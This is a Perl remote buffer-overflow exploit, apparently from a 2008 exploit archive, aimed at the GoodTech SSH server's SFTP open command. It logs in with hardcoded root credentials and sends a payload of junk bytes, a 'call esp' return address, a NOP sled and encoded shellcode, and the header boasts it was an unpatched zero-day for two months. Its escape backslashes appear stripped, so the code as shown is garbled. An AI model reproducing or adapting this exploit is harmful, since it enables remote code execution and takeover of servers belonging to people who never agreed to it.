# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer oveflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentialsn";
print "[+] Sending payloadn";

my $junk = 'A'x164;
my $eip = "x49x13x9cx7c"; #call esp
my $nops = "x90"x20;

my $shellcode =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x33".
"x2ex9cx0ex83xebxfcxe2xf4xcfx44x77x43xdbxd7x63xf1".
"xccx4ex17x62x17x0ax17x4bx0fxa5xe0x0bx4bx2fx73x85".
"x7cx36x17x51x13x2fx77x47xb8x1ax17x0fxddx1fx5cx97".
"x9fxaax5cx7ax34xefx56x03x32xecx77xfax08x7axb8x26".
"x46xcbx17x51x17x2fx77x68xb8x22xd7x85x6cx32x9dxe5".
"x30x02x17x87x5fx0ax80x6fxf0x1fx47x6axb8x6dxacx85".
"x73x22x17x7ex2fx83x17x4ex3bx70xf4x80x7dx20x70x5e".
"xccxf8xfax5dx55x46xafx3cx5bx59xefx3cx6cx7ax63xde".
"x5bxe5x71xf2x08x7ex63xd8x6cxa7x79x68xb2xc3x94x0c".
"x66x44x9exf1xe3x46x45x07xc6x83xcbxf1xe5x7dxcfx5d".
"x60x7dxdfx5dx70x7dx63xdex55x46x8dx52x55x7dx15xef".
"xa6x46x38x14x43xe9xcbxf1xe5x44x8cx5fx66xd1x4cx66".
"x97x83xb2xe7x64xd1x4ax5dx66xd1x4cx66xd6x67x1ax47".
"x64xd1x4ax5ex67x7axc9xf1xe3xbdxf4xe9x4axe8xe5x59".
"xccxf8xc9xf1xe3x48xf6x6ax55x46xffx63xbaxcbxf6x5e".
"x6ax07x50x87xd4x44xd8x87xd1x1fx5cxfdx99xd0xdex23".
"xcdx6cxb0x9dxbex54xa4xa5x98x85xf4x7cxcdx9dx8axf1".
"x46x6ax63xd8x68x79xcex5fx62x7fxf6x0fx62x7fxc9x5f".
"xccxfexf4xa3xeax2bx52x5dxccxf8xf6xf1xccx19x63xde".
"xb8x79x60x8dxf7x4ax63xd8x61xd1x4cx66xdcxe0x7cx6e".
"x60xd1x4axf1xe3x2ex9cx0e";

my $payload = $junk.$eip.$nops.$shellcode;

my $sftp = $ssh2->sftp();
$sftp->open($payload);

print "[+] Sent";
$ssh2->disconnect;

# www.Syue.com [2008-10-22]